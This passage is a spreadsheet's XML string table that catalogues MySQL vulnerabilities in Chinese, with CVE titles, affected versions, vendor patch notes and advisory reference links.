https://bugs.mysql.com/bug.php?id=54461</t>
  </si>
  <si>
    <t>MySQL释放后使用错误漏洞(CVE-2010-3837)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-172
http://lists.apple.com/archives/security-announce/2011/Jun/msg00000.html
http://support.apple.com/kb/HT4723
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-310
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-309
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-312
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-311
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-306
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-308
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-307
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-314
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-313
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-176
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-174
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-173</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:Information Schema子组件拒绝服务漏洞(CVE-2015-0500)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.23以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-342
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-345</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:Optimizer子组件拒绝服务漏洞(CVE-2015-0423)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.22及之前版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-287
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-355
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-286
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201411-496
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-357
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-288</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:InnoDB子组件拒绝服务漏洞(CVE-2015-0506)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:Security:Privileges子组件拒绝服务漏洞(CVE-2015-2567)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-356
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-345
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-342
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-343</t>
  </si>
  <si>
    <t>MySQL多个函数拒绝服务漏洞(CVE-2010-3838)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-171
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201208-292
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-176
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-175
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-174
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-173
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-172</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程拒绝服务漏洞(CVE-2012-0102)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-256
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-263
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB远程拒绝服务漏洞(CVE-2012-0490)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-277
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-263
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-256
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-259</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程拒绝服务漏洞(CVE-2012-0101)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-259
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-263
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-279
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-269
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201201-256</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:Partition 拒绝服务漏洞(CVE-2015-0438)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.22以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-289
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-355
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-286
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201411-496
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-357
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-288
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-287</t>
  </si>
  <si>
    <t>MySQL sql_base.cc 远程信息泄漏与缓冲区溢出漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.20版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：The mysql Project ---------  目前 The mysql Project 已经发布 mysql 最新版本, 请到厂商的官方页面下载最新版本:  链接：http://dev.mysql.com/downloads/mirrors.html</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/602457
http://www.wisec.it/vulns.php?page=8
http://www.frsirt.com/english/advisories/2006/1633
https://exchange.xforce.ibmcloud.com/vulnerabilities/26232</t>
  </si>
  <si>
    <t>MySQL MyISAM表绕过权限检查漏洞</t>
  </si>
  <si>
    <t>影响mysql:4.1.0版本(含)到4.1.24版本,5.1.0版本(含)到5.1.24版本,5.0.0版本(含)到5.0.60版本,6.0.0版本(含)到6.0.5版本</t>
  </si>
  <si>
    <t>厂商补丁：MySQL AB--------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.mysql.com/</t>
  </si>
  <si>
    <t>http://secunia.com/advisories/30134/http://dev.mysql.com/doc/refman/4.1/en/news-4-1-24.htmlhttp://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-60.htmlhttp://bugs.mysql.com/bug.php?id=32167</t>
  </si>
  <si>
    <t>mysql debian.cnf明文凭据泄漏(CVE-2013-2162)</t>
  </si>
  <si>
    <t>这允许本地用户读取文件并获取特权“debian-sys-maint”用户的凭据。</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.ubuntu.com/usn/usn-1909-1/</t>
  </si>
  <si>
    <t>https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=711600
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201306-201
http://www.debian.org/security/2013/dsa-2818</t>
  </si>
  <si>
    <t>MySQL 企业服务版绕过权限查询漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.67版本</t>
  </si>
  <si>
    <t>MySQL &lt; 5.0.90 / 5.1.43 / 5.5.0-m2 多个缓冲区溢出漏洞(CVE-2009-4484)</t>
  </si>
  <si>
    <t>ips-16385（无效）</t>
  </si>
  <si>
    <t>MySQL 版本低于 5.0.90、5.1.43 或 5.5.0-m2。。</t>
  </si>
  <si>
    <t>升级到 MySQL 5.0.90 / 5.1.43 / 5.5.0-m2 或更高版本。</t>
  </si>
  <si>
    <t>https://bugs.mysql.com/bug.php?id=50227
https://www.rapid7.com/db/modules/exploit/linux/mysql/mysql_yassl_getname
http://yassl.cvs.sourceforge.net/viewvc/yassl/yassl/taocrypt/src/asn.cpp?r1=1.13&amp;r2=1.14
https://lists.mysql.com/commits/96697
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200912-425</t>
  </si>
  <si>
    <t>Oracle MySQL 存在拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0版本(含)到5.0.66版本,5.1版本(含)到5.1.26版本,6.0版本(含)到6.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：MySQL AB--------[1]目前厂商已经发布升级版本修复此安全问题，建议升级MySQL 5.1产品至5.1.26版本或之后版本，请到厂商的官方页面下载升级版本：http://dev.mysql.com/downloads/mysql/5.1.html [2]目前厂商已经发布升级版本修复此安全问题，建议升级MySQL 6.0产品至6.0.6版本或之后版本，请到厂商的官方页面下载升级版本：http://dev.mysql.com/downloads/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-2611)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.24以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-509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</si>
  <si>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Server远程安全漏洞(CVE-2015-2617)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-515
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/
https://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4756)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-589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t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4816)</t>
  </si>
  <si>
    <t>影响MySQL: 5.5.44及之前版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/alerts-086861.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-397
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368795.xml
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-438
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-487
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-456
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-390
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-435
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-396</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4730)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.20以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-370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t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4895)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.25以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-470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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-478
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-479</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0511)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347</t>
  </si>
  <si>
    <t>Oracle MySQL Server Server:Replication子组件拒绝服务漏洞(CVE-2015-0498)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-340
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-345
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-342
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-343
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-356
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-350
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-359</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4767)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-598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</si>
  <si>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Server远程安全漏洞(CVE-2015-2639)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-536
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/
https://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-515</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4761)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-594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</si>
  <si>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Server远程安全漏洞(CVE-2015-4772)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-603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</si>
  <si>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Server远程安全漏洞(CVE-2015-4833)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413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t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4904)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.26以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-478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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4791)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-374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t>
  </si>
  <si>
    <t>Oracle MySQL Server本地安全漏洞(CVE-2015-4766)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-373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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-413
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-416
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-611
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-465
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-478
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-479
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-470
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-456</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-2641)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-538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</si>
  <si>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Server远程安全漏洞(CVE-2015-4771)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-602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</si>
  <si>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Server本地安全漏洞(CVE-2015-2661)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-557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
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201507-600</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-2566)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-355</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0507)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0594)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.21以下版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-580
https://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html#AppendixMSQL
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-419
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-423
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-504
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-505
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-417
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-550
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-449</t>
  </si>
  <si>
    <t>Oracle MySQL Server Client组件任意代码执行漏洞(CVE-2016-0504)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.27以下版本(含),5.7.9版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-491
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-28.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-490
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-592
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-593
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-492
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-581
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-586</t>
  </si>
  <si>
    <t>MySQL服务器RENAME TABLE系统表格覆盖漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.1.0版本(含)到5.1.23版本,5.0.0版本(含)到5.0.50版本,6.0.0版本(含)到6.0.4版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://dev.mysql.com/get/Downloads/MySQL-5.0/mysql-5.0.51.tar.gz/from/pick</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200712-083
http://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-52.html</t>
  </si>
  <si>
    <t>MySQL 'mysql_uninstall_plugin'函数权限许可和访问控制漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.1.46以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：MandrakeSoft Linux Mandrake 2009.1 x86_64Mandriva mysql-bench-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva lib64mysql-static-devel-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-tools-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva lib64mysql-devel-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-storage-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-doc-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-max-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva lib64mysql16-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-extra-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-client-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-management-5.1.42-0.3mdv2009.1.x86_64.rpmhttp://www.mandriva.com/en/download/MandrakeSoft Linux Mandrake 2010.0Mandriva mysql-ndb-extra-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-management-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-doc-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-core-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-core-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-bench-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-client-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva libmysql-devel-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva libmysql-static-devel-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-tools-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-storage-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-max-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva libmysql16-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-5.1.42-0.3mdv2010.0.i586.rpmhttp://www.mandriva.com/en/download/MandrakeSoft Linux Mandrake 2010.0 x86_64Mandriva lib64mysql16-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-core-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-doc-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-tools-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva lib64mysql-devel-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-max-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-storage-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-bench-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-client-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva lib64mysql-static-devel-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-common-core-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-management-5.1.42-0.3mdv2010.0.x86_64.rpmhttp://www.mandriva.com/en/download/Mandriva mysql-ndb-extra-5.1.42-0.3mdv2010.0.x86_64</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201005-233
https://bugs.mysql.com/bug.php?id=51770
https://bugs.mysql.com/bug.php?id=40980</t>
  </si>
  <si>
    <t>MySQL 权限许可和访问控制漏洞</t>
  </si>
  <si>
    <t>影响MySQL:5.0.88以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.mysql.com/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201210-142
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200911-315</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-4862)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-439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t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0405)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-286
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-355
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-361</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0503)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-345
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2015-0508)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-350
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-348
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-347
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-345
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-342
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-343
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201504-356</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2016-0607)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-591
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-28.html
https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-490
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-592
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-593
